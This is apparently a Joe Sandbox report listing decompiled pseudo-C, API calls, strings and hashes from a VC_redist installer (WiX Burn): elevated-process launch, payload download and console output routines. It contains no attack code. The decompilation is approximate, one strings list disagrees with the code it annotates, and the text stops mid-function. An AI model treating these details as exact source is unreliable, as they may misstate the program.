                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
                                                                          • String ID: @Met$Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                          • API String ID: 1811509786-2510125051
                                                                          • Opcode ID: 1e71567c4eb4a155cfe6077ef08c3ab74a4fb2c320974c2d69ab086c47792b28
                                                                          • Instruction ID: 50b7077c44cb5378f3401cb05fa8019940971c689a06eca070710e25247010a6
                                                                          • Opcode Fuzzy Hash: 1e71567c4eb4a155cfe6077ef08c3ab74a4fb2c320974c2d69ab086c47792b28
                                                                          • Instruction Fuzzy Hash: 7A214B32E44718BBDB116AA4DE42AEFB7A9EF14310F204322FD00E5191E7719E90D7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E00024ED2(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				void* __edi;
                                                                          				long _t26;
                                                                          				char* _t32;
                                                                          				void* _t43;
                                                                          				intOrPtr* _t46;
                                                                          				void* _t47;
                                                                          
                                                                          				_t26 = GetCurrentProcessId();
                                                                          				_t46 = _a8;
                                                                          				_push(_t26);
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_push( *((intOrPtr*)(_t46 + 4)));
                                                                          				_v20 = 0;
                                                                          				_push( *_t46);
                                                                          				_v8 = 0;
                                                                          				_t47 = E00011F20( &_v12, L"-q -%ls %ls %ls %u", L"burn.elevated");
                                                                          				if(_t47 >= 0) {
                                                                          					E000539CD( &_v16,  &_v20);
                                                                          					if(_v16 < 5) {
                                                                          						L5:
                                                                          						_t32 = L"open";
                                                                          					} else {
                                                                          						_t32 = L"runas";
                                                                          						if(_a12 == 0) {
                                                                          							goto L5;
                                                                          						}
                                                                          					}
                                                                          					_t47 = E00053B4A(_t46, _a4, _v12, _t32, 0, 0, _a16,  &_v8);
                                                                          					if(_t47 >= 0) {
                                                                          						 *((intOrPtr*)(_t46 + 8)) = GetProcessId(_v8);
                                                                          						_t43 = 0;
                                                                          						 *((intOrPtr*)(_t46 + 0xc)) = _v8;
                                                                          						_v8 = 0;
                                                                          					} else {
                                                                          						E0005012F(_t47, "Failed to launch elevated child process: %ls", _a4);
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to allocate parameters for elevated process.");
                                                                          					_push(_t47);
                                                                          					E0005012F();
                                                                          					L2:
                                                                          					_t43 = _v8;
                                                                          				}
                                                                          				if(_t43 != 0) {
                                                                          					CloseHandle(_t43);
                                                                          					_v8 = 0;
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				return _t47;
                                                                          			}














                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,?,?,0005B4F0), ref: 00024EDB
                                                                          • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00024F79
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00024F92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCurrentHandle
                                                                          • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                          • API String ID: 2815245435-1352204306
                                                                          • Opcode ID: a40ac446286567db880ea5f013925570d302d9767d0e2ee55af96a963d6da85a
                                                                          • Instruction ID: ae8a28aaf2fa7c38f754da7faa15cd1e7246f7c4ab3ba49ad4941d10cb630fae
                                                                          • Opcode Fuzzy Hash: a40ac446286567db880ea5f013925570d302d9767d0e2ee55af96a963d6da85a
                                                                          • Instruction Fuzzy Hash: E5219C75D00229BFDF01DF94DD818EEBBB9EF04351B10817AF904A6241C775AF109B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • TlsSetValue.KERNEL32(?,?), ref: 0002AB53
                                                                          • GetLastError.KERNEL32 ref: 0002AB5D
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 0002AB9C
                                                                          • CoUninitialize.OLE32(?,0002C4F4,?,?), ref: 0002ABD9
                                                                          Strings
                                                                          • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0002AB8B
                                                                          • elevation.cpp, xrefs: 0002AB81
                                                                          • Failed to initialize COM., xrefs: 0002ABA8
                                                                          • Failed to pump messages in child process., xrefs: 0002ABC7
                                                                          • @Met, xrefs: 0002AB5D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorInitializeLastUninitializeValue
                                                                          • String ID: @Met$Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                          • API String ID: 876858697-3541924490
                                                                          • Opcode ID: 9f158e2ae685a844a1b8eec0bd3c1dd3cbff0352e5c205182bc806f507379490
                                                                          • Instruction ID: 4a07158e539f20f62c3489108a9648b2c8c4a0afa49d31ca531d1c528a750d73
                                                                          • Opcode Fuzzy Hash: 9f158e2ae685a844a1b8eec0bd3c1dd3cbff0352e5c205182bc806f507379490
                                                                          • Instruction Fuzzy Hash: 85115932A00B31BBA7221765EC05DAFBA99EF05721B004116FD04F7151EF60AD00D7E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 40%
                                                                          			E0002F3E6(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				intOrPtr* _t41;
                                                                          				intOrPtr* _t46;
                                                                          				intOrPtr* _t49;
                                                                          				intOrPtr _t57;
                                                                          				intOrPtr _t60;
                                                                          				intOrPtr* _t71;
                                                                          				intOrPtr* _t72;
                                                                          				signed int* _t75;
                                                                          				void* _t77;
                                                                          
                                                                          				_t62 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_t60 = _a4;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				EnterCriticalSection( *(_t60 + 0xc));
                                                                          				_t77 = E0001D459( *(_t60 + 0xc) + 0xb8);
                                                                          				if(_t77 >= 0) {
                                                                          					_t71 = _a12;
                                                                          					if(_t71 == 0 ||  *_t71 == 0) {
                                                                          						_t72 = _a8;
                                                                          						if(_t72 == 0 ||  *_t72 == 0) {
                                                                          							_t77 = 0x80070057;
                                                                          							_push("UX did not provide container or payload id.");
                                                                          							goto L34;
                                                                          						} else {
                                                                          							_t77 = E0001C0A9(_t62,  *(_t60 + 0xc) + 0x2a8, _t72,  &_v12);
                                                                          							if(_t77 >= 0) {
                                                                          								_t75 = _v12 + 0x2c;
                                                                          								goto L15;
                                                                          							}
                                                                          							_push(_t72);
                                                                          							_push("UX requested unknown container with id: %ls");
                                                                          							goto L13;
                                                                          						}
                                                                          					} else {
                                                                          						_t77 = E0001CC57(_t62,  *(_t60 + 0xc) + 0x2b8, _t71,  &_v8);
                                                                          						if(_t77 >= 0) {
                                                                          							_t57 = _v8;
                                                                          							if( *((intOrPtr*)(_t57 + 4)) != 2) {
                                                                          								_t75 = _t57 + 0x40;
                                                                          								L15:
                                                                          								_t41 = _a16;
                                                                          								if(_t41 == 0 ||  *_t41 == 0) {
                                                                          									if( *_t75 != 0) {
                                                                          										E000554EF( *_t75);
                                                                          										 *_t75 =  *_t75 & 0x00000000;
                                                                          									}
                                                                          									goto L29;
                                                                          								} else {
                                                                          									_t77 = E000121A5(_t75, _t41, 0);
                                                                          									if(_t77 >= 0) {
                                                                          										_t46 = _a20;
                                                                          										if(_t46 == 0 ||  *_t46 == 0) {
                                                                          											L29:
                                                                          											if(_t75[1] != 0) {
                                                                          												E000554EF(_t75[1]);
                                                                          												_t75[1] = _t75[1] & 0x00000000;
                                                                          											}
                                                                          											goto L31;
                                                                          										} else {
                                                                          											_t77 = E000121A5( &(_t75[1]), _t46, 0);
                                                                          											if(_t77 >= 0) {
                                                                          												_t49 = _a24;
                                                                          												if(_t49 == 0 ||  *_t49 == 0) {
                                                                          													L31:
                                                                          													if(_t75[2] != 0) {
                                                                          														E000554EF(_t75[2]);
                                                                          														_t75[2] = _t75[2] & 0x00000000;
                                                                          													}
                                                                          												} else {
                                                                          													_t77 = E000121A5( &(_t75[2]), _t49, 0);
                                                                          													if(_t77 >= 0) {
                                                                          														goto L35;
                                                                          													}
                                                                          													_push("Failed to set download password.");
                                                                          													L34:
                                                                          													_push(_t77);
                                                                          													E0005012F();
                                                                          												}
                                                                          												goto L35;
                                                                          											}
                                                                          											_push("Failed to set download user.");
                                                                          											goto L34;
                                                                          										}
                                                                          									}
                                                                          									_push("Failed to set download URL.");
                                                                          									goto L34;
                                                                          								}
                                                                          							}
                                                                          							_push(_t71);
                                                                          							_t77 = 0x800710dd;
                                                                          							_push("UX denied while trying to set download URL on embedded payload: %ls");
                                                                          							goto L13;
                                                                          						} else {
                                                                          							_push(_t71);
                                                                          							_push("UX requested unknown payload with id: %ls");
                                                                          							L13:
                                                                          							_push(_t77);
                                                                          							E0005012F();
                                                                          							L35:
                                                                          							goto L36;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Engine is active, cannot change engine state.");
                                                                          					_push(_t77);
                                                                          					E0005012F();
                                                                          					L36:
                                                                          					LeaveCriticalSection( *(_t60 + 0xc));
                                                                          					return _t77;
                                                                          				}
                                                                          			}















                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0002F3FB
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0002F576
                                                                          Strings
                                                                          • UX did not provide container or payload id., xrefs: 0002F565
                                                                          • user is active, cannot change user state., xrefs: 0002F415
                                                                          • Failed to set download URL., xrefs: 0002F4D5
                                                                          • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0002F466
                                                                          • Failed to set download password., xrefs: 0002F524
                                                                          • Failed to set download user., xrefs: 0002F4FE
                                                                          • UX requested unknown container with id: %ls, xrefs: 0002F4A0
                                                                          • UX requested unknown payload with id: %ls, xrefs: 0002F450
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: user is active, cannot change user state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                          • API String ID: 3168844106-2615595102
                                                                          • Opcode ID: 416329033e5bad91692d4da48262db6fc49380c6e15df7fda89f4f1c3b307914
                                                                          • Instruction ID: 3a7fa2b761b5eb2362755a206d5055ad1f2eb3f7f29fd31186f23c424375ca37
                                                                          • Opcode Fuzzy Hash: 416329033e5bad91692d4da48262db6fc49380c6e15df7fda89f4f1c3b307914
                                                                          • Instruction Fuzzy Hash: FC41E571A00A33BBDB61AE24E805ABBB3B8EF01751F148175FA05EB241DB74ED40CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 87%
                                                                          			E0003A024(intOrPtr* _a4, WCHAR* _a8) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				intOrPtr* _v32;
                                                                          				signed int _v36;
                                                                          				char _v40;
                                                                          				intOrPtr _v44;
                                                                          				intOrPtr _v48;
                                                                          				char _v52;
                                                                          				intOrPtr _t62;
                                                                          				intOrPtr _t64;
                                                                          				void* _t68;
                                                                          				intOrPtr* _t72;
                                                                          				void* _t79;
                                                                          				signed int _t83;
                                                                          				long _t84;
                                                                          				signed short _t86;
                                                                          				intOrPtr* _t94;
                                                                          				intOrPtr* _t95;
                                                                          				intOrPtr* _t98;
                                                                          				intOrPtr* _t99;
                                                                          				void* _t100;
                                                                          				WCHAR* _t103;
                                                                          				intOrPtr* _t104;
                                                                          				void* _t105;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t62 = 0x5b524;
                                                                          				_t104 = _a4;
                                                                          				_v12 = 0x5b524;
                                                                          				_t5 = _t104 + 4; // 0x75c08524
                                                                          				_t95 =  *_t5;
                                                                          				if(_t95 == 0) {
                                                                          					_t6 = _t104 + 8; // 0x2c453905
                                                                          					_t98 =  *_t6;
                                                                          					if(_t98 != 0) {
                                                                          						_t62 =  *_t98;
                                                                          					}
                                                                          				} else {
                                                                          					_t62 =  *_t95;
                                                                          				}
                                                                          				_t7 = _t104 + 0xc; // 0x458b3e74
                                                                          				_t99 =  *_t7;
                                                                          				_a4 = _t62;
                                                                          				if(_t99 != 0) {
                                                                          					_v12 =  *_t99;
                                                                          				}
                                                                          				_t10 = _t95 + 0x2c; // 0x75c08550
                                                                          				_t94 = _t10;
                                                                          				if(_t95 != 0) {
                                                                          					_v20 =  *((intOrPtr*)(_t95 + 0x18));
                                                                          					_t64 =  *((intOrPtr*)(_t95 + 0x1c));
                                                                          				} else {
                                                                          					_t12 = _t99 + 0x40; // 0x458b3eb4
                                                                          					_t94 = _t12;
                                                                          					_v20 =  *((intOrPtr*)(_t99 + 0x10));
                                                                          					_t64 =  *((intOrPtr*)(_t99 + 0x14));
                                                                          				}
                                                                          				_v28 = _v28 & 0x00000000;
                                                                          				_v24 = _v24 & 0x00000000;
                                                                          				_v16 = _t64;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				if(_t95 == 0) {
                                                                          					_t68 =  !=  ? 0x20000152 : 0x2000014f;
                                                                          				} else {
                                                                          					_t68 = (0 | _t99 != 0x00000000) + 0x20000150;
                                                                          				}
                                                                          				_push( *_t94);
                                                                          				_push("download");
                                                                          				_push(_v12);
                                                                          				E0001550F(2, _t68, _a4);
                                                                          				_t103 = _a8;
                                                                          				if(E00054315(_t103,  &_v8) == 0) {
                                                                          					L16:
                                                                          					_v36 = _v36 & 0x00000000;
                                                                          					_v40 = E0003993C;
                                                                          					_v32 = _t104;
                                                                          					_t72 =  *_t94;
                                                                          					_t97 = 0x62;
                                                                          					if(_t97 !=  *_t72) {
                                                                          						L24:
                                                                          						_v52 =  *_t104;
                                                                          						_v48 = _a4;
                                                                          						_v44 = _v12;
                                                                          						_v24 =  &_v52;
                                                                          						_v28 = E00039855;
                                                                          						_t79 = E0005635A(_t97, _t94, _v20, _v16, _t103,  &_v40,  &_v28);
                                                                          						L25:
                                                                          						_t105 = _t79;
                                                                          						if(_t105 < 0) {
                                                                          							_push(_t103);
                                                                          							E0005012F(_t105, "Failed attempt to download URL: \'%ls\' to: \'%ls\'",  *_t94);
                                                                          						}
                                                                          						goto L27;
                                                                          					}
                                                                          					_t97 = 0x69;
                                                                          					if(_t97 !=  *((intOrPtr*)(_t72 + 2))) {
                                                                          						goto L24;
                                                                          					}
                                                                          					_t97 = 0x74;
                                                                          					if(_t97 !=  *((intOrPtr*)(_t72 + 4))) {
                                                                          						goto L24;
                                                                          					}
                                                                          					_t100 = 0x73;
                                                                          					if(_t100 !=  *((intOrPtr*)(_t72 + 6))) {
                                                                          						goto L24;
                                                                          					}
                                                                          					_t97 =  *(_t72 + 8) & 0x0000ffff;
                                                                          					_a8 = 0x3a;
                                                                          					if(_a8 == _t97) {
                                                                          						L23:
                                                                          						_t79 = E0003DC0D(_t100,  &_v40, _t94, _t103);
                                                                          						goto L25;
                                                                          					}
                                                                          					if(_t100 != _t97) {
                                                                          						goto L24;
                                                                          					}
                                                                          					_t97 = _a8;
                                                                          					if(_a8 !=  *((intOrPtr*)(_t72 + 0xa))) {
                                                                          						goto L24;
                                                                          					}
                                                                          					goto L23;
                                                                          				} else {
                                                                          					_t83 = _v8;
                                                                          					if((_t83 & 0x00000001) == 0) {
                                                                          						goto L16;
                                                                          					}
                                                                          					_t84 = _t83 & 0xfffffffe;
                                                                          					_v8 = _t84;
                                                                          					if(SetFileAttributesW(_t103, _t84) != 0) {
                                                                          						goto L16;
                                                                          					}
                                                                          					_t86 = GetLastError();
                                                                          					_t108 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                          					_t105 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "apply.cpp", 0x568, _t105);
                                                                          					E0005012F(_t105, "Failed to clear readonly bit on payload destination path: %ls", _t103);
                                                                          					L27:
                                                                          					return _t105;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,00000001,00000000,?), ref: 0003A0F1
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0003A0FB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLast
                                                                          • String ID: :$@Met$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                          • API String ID: 1799206407-517928513
                                                                          • Opcode ID: dc8b1a42bffa74389d6c2943569e05b8f7bbb0ddeb1e50c581882a28be8e1b49
                                                                          • Instruction ID: 889529c396d36c25213b30d61b98721eebc15c665906ca6100f79286709f511c
                                                                          • Opcode Fuzzy Hash: dc8b1a42bffa74389d6c2943569e05b8f7bbb0ddeb1e50c581882a28be8e1b49
                                                                          • Instruction Fuzzy Hash: E2519E71A00209AFDB12DFA8C845AEFB7F9EF06710F108159E945EB251E775EE40CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 40%
                                                                          			E0005635A(void* __ecx, intOrPtr* _a4, signed short _a8, WCHAR* _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                          				signed int _v8;
                                                                          				char _v12;
                                                                          				signed int _v16;
                                                                          				WCHAR* _v20;
                                                                          				intOrPtr _v24;
                                                                          				char _v28;
                                                                          				signed short _v32;
                                                                          				void* _v36;
                                                                          				WCHAR* _v40;
                                                                          				char _v44;
                                                                          				signed int _t57;
                                                                          				WCHAR* _t69;
                                                                          				signed short _t78;
                                                                          				WCHAR* _t85;
                                                                          				void* _t88;
                                                                          				intOrPtr* _t90;
                                                                          
                                                                          				_t82 = __ecx;
                                                                          				_v16 = _v16 | 0xffffffff;
                                                                          				_t81 = _a4;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_v12 = 0;
                                                                          				_t85 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_v44 = 0;
                                                                          				_v40 = 0;
                                                                          				asm("movlpd [ebp-0x18], xmm0");
                                                                          				asm("movlpd [ebp-0x20], xmm0");
                                                                          				_t88 = E000121A5( &_v12,  *_a4, 0);
                                                                          				if(_t88 < 0) {
                                                                          					L12:
                                                                          					_t48 = _v20;
                                                                          					if(_v20 != 0) {
                                                                          						E000554EF(_t48);
                                                                          					}
                                                                          					if(_t85 != 0) {
                                                                          						 *0x7a96c(_t85);
                                                                          					}
                                                                          					if(_v12 != 0) {
                                                                          						E000554EF(_v12);
                                                                          					}
                                                                          					return _t88;
                                                                          				}
                                                                          				 *0x7a98c(L"Burn", 0, 0, 0, 0);
                                                                          				_t85 = 0;
                                                                          				if(0 != 0) {
                                                                          					E000556B2(__ecx, L"WiX\\Burn", L"DownloadTimeout", 0x78,  &_v8);
                                                                          					_t57 = _v8;
                                                                          					if(_t57 != 0) {
                                                                          						_t90 =  *0x7a970; // 0x5a79b
                                                                          						_v8 = _t57 * 0x3e8;
                                                                          						 *_t90(0, 2,  &_v8, 4);
                                                                          						 *_t90(0, 6,  &_v8, 4);
                                                                          						 *_t90(0, 5,  &_v8, 4);
                                                                          					}
                                                                          					_t88 = E00055BBF(_t82, _t85,  &_v12,  *((intOrPtr*)(_t81 + 4)),  *((intOrPtr*)(_t81 + 8)), _a24,  &_v36,  &_v44);
                                                                          					if(_t88 >= 0) {
                                                                          						E00055C68(_t82, _a16,  &_v20,  &_v16,  &_v28);
                                                                          						_t88 = E00055916(_t85,  &_v12,  *((intOrPtr*)(_t81 + 4)),  *((intOrPtr*)(_t81 + 8)), _a16, _a8, _a12, _v36, _v32, _v28, _v24, _v16, _a20, _a24);
                                                                          						if(_t88 >= 0) {
                                                                          							_t69 = _v20;
                                                                          							if(_t69 != 0 &&  *_t69 != 0) {
                                                                          								DeleteFileW(_t69);
                                                                          							}
                                                                          						}
                                                                          						if(_v16 != 0xffffffff) {
                                                                          							CloseHandle(_v16);
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t78 = GetLastError();
                                                                          					_t93 =  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
                                                                          					_t88 =  >=  ? 0x80004005 :  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "dlutil.cpp", 0x84, _t88);
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000563B7
                                                                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 000564AE
                                                                          • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 000564BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteErrorFileHandleLast
                                                                          • String ID: @Met$Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                          • API String ID: 3522763407-3605160450
                                                                          • Opcode ID: 2ac9848d48d140fc86f6e201e4ad42742f72c9e84df25f42076f466e4380a52a
                                                                          • Instruction ID: cf989e8097e4aafc70fe4a2f6419733997d78d9f8f8139b2e2227717391111b9
                                                                          • Opcode Fuzzy Hash: 2ac9848d48d140fc86f6e201e4ad42742f72c9e84df25f42076f466e4380a52a
                                                                          • Instruction Fuzzy Hash: C2513972D00619BBDF129FA4CC41EEFBAB9EF08711F004155FE04E6190EB368A549BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 79%
                                                                          			E0004C9BD(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				signed char _v15;
                                                                          				char _v16;
                                                                          				void _v24;
                                                                          				short _v28;
                                                                          				char _v31;
                                                                          				void _v32;
                                                                          				long _v36;
                                                                          				intOrPtr _v40;
                                                                          				void* _v44;
                                                                          				signed int _v48;
                                                                          				signed char* _v52;
                                                                          				long _v56;
                                                                          				int _v60;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t78;
                                                                          				signed int _t80;
                                                                          				int _t86;
                                                                          				void* _t92;
                                                                          				void* _t94;
                                                                          				long _t97;
                                                                          				void _t105;
                                                                          				void* _t112;
                                                                          				signed int _t115;
                                                                          				signed int _t117;
                                                                          				signed char _t122;
                                                                          				signed char _t127;
                                                                          				signed int _t128;
                                                                          				signed char* _t129;
                                                                          				intOrPtr* _t130;
                                                                          				signed int _t131;
                                                                          				void* _t132;
                                                                          
                                                                          				_t78 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t78 ^ _t131;
                                                                          				_t80 = _a8;
                                                                          				_t117 = _t80 >> 6;
                                                                          				_t115 = (_t80 & 0x0000003f) * 0x30;
                                                                          				_t129 = _a12;
                                                                          				_v52 = _t129;
                                                                          				_v48 = _t117;
                                                                          				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x7b158 + _t117 * 4)) + _t115 + 0x18));
                                                                          				_v40 = _a16 + _t129;
                                                                          				_t86 = GetConsoleCP();
                                                                          				_t130 = _a4;
                                                                          				_v60 = _t86;
                                                                          				 *_t130 = 0;
                                                                          				 *((intOrPtr*)(_t130 + 4)) = 0;
                                                                          				 *((intOrPtr*)(_t130 + 8)) = 0;
                                                                          				while(_t129 < _v40) {
                                                                          					_v28 = 0;
                                                                          					_v31 =  *_t129;
                                                                          					_t128 =  *(0x7b158 + _v48 * 4);
                                                                          					_t122 =  *(_t128 + _t115 + 0x2d);
                                                                          					if((_t122 & 0x00000004) == 0) {
                                                                          						_t92 = E00048DB8(_t115, _t128);
                                                                          						_t128 = 0x8000;
                                                                          						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                          							_push(1);
                                                                          							_push(_t129);
                                                                          							goto L8;
                                                                          						} else {
                                                                          							if(_t129 >= _v40) {
                                                                          								_t128 = _v48;
                                                                          								 *((char*)( *((intOrPtr*)(0x7b158 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
                                                                          								 *( *((intOrPtr*)(0x7b158 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x7b158 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
                                                                          								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
                                                                          							} else {
                                                                          								_t112 = E000465B6( &_v28, _t129, 2);
                                                                          								_t132 = _t132 + 0xc;
                                                                          								if(_t112 != 0xffffffff) {
                                                                          									_t129 =  &(_t129[1]);
                                                                          									goto L9;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t127 = _t122 & 0x000000fb;
                                                                          						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
                                                                          						_push(2);
                                                                          						_v15 = _t127;
                                                                          						 *(_t128 + _t115 + 0x2d) = _t127;
                                                                          						_push( &_v16);
                                                                          						L8:
                                                                          						_push( &_v28);
                                                                          						_t94 = E000465B6();
                                                                          						_t132 = _t132 + 0xc;
                                                                          						if(_t94 != 0xffffffff) {
                                                                          							L9:
                                                                          							_t129 =  &(_t129[1]);
                                                                          							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                          							_v56 = _t97;
                                                                          							if(_t97 != 0) {
                                                                          								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                          									L19:
                                                                          									 *_t130 = GetLastError();
                                                                          								} else {
